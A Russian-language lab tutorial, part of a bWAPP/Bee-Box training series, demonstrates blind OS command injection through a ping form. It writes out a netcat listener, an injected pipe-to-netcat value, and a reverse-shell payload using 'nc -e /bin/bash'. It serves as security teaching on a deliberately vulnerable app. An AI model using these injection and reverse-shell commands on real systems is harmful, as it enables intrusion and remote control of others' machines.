Bee-Box, bWAPP (buggy web application), OS Command Injection, Уязвимости

#10 Уязвимость — OS Command Injection (Blind).

Здравствуйте, дорогие друзья.

Продолжаем рассматривать уязвимости, и в данном уроке остановимся на слепой уязвимости внедрения команд.

Перейдем на страницу уязвимости, и увидим поле для ввода, с кнопкой «Ping»:

Перейдем на страницу уязвимости, и увидим поле для ввода, с кнопкой «Ping»

Можем «пингануть» ip-адрес, и в конечном итоге ничего не увидим на экране.

Итак, нам нужно попробовать что-то еще. Воспользуемся инструментом Wireshark, для перехвата трафика, предварительно отфильтровав пакеты, с параметром ICMP. Дублируем наш ip-адрес, и жмем кнопку «Ping»:

перехватываем трафик с помощью wireshark

Как видим, активность присутствует, и пинги прошли (ответа нет, но пинги идут).


Давайте попробуем использовать netcat для того, чтобы установить обратное соединение. Введем в терминале кодманду «nc -lvp 4444»:

nc -lvp 4444

Мы настроили прослушиватель netcat на порт 4444, а затем попытаемся подключиться к нему, используя инъекцию команды os с компьютера жертвы. Команда будет выглядеть как «localhost | nc 10.0.2.15 4444»:

localhost | nc 10.0.2.15 4444

Жмем кнопку «Ping», и получаем соединение:

Жмем кнопку «Ping», и получаем соединение

Теперь проэксплуатируем обратный шелл (reverse shell), с помощью команды «127.0.0.1 | nc 10.0.2.15 4444 -e /bin/bash», предварительно прослушивая вышеописанный порт с помощью той же команды: «nc -lvp 4444»:

nc -lvp 4444
127.0.0.1 | nc 10.0.2.15 4444 -e /bin/bash

В итоге получаем обратный шелл:

В итоге получаем обратный шелл

Можно попытаться подключить интерактивный шелл (interactive shell). Это я оставлю Вам в качестве домашнего задания.

На этом все. Всем хорошего дня!

#1 bWAPP — buggy web application (глючное веб-приложение). Bee-Box. Установка на Virtualbox в Parrot Security OS.

#2 bWAPP (Bee-Box) — первоначальная настройка.

#3 Уязвимость HTMl Injection — Reflected (GET) уровень (Medium).

#4 Уязвимость HTML Injection — Reflected (POST) уровень (Low).

#5 Уязвимость HTML Injection — Reflected (POST) средний уровень.

#6 Уязвимость HTML Injection — Reflected (Current URL) уровень low.

#7 Уязвимость HTML Injection — Stored (Blog).

#8 Уязвимость iFrame-Injection.

#9 Уязвимость — OS Command Injection.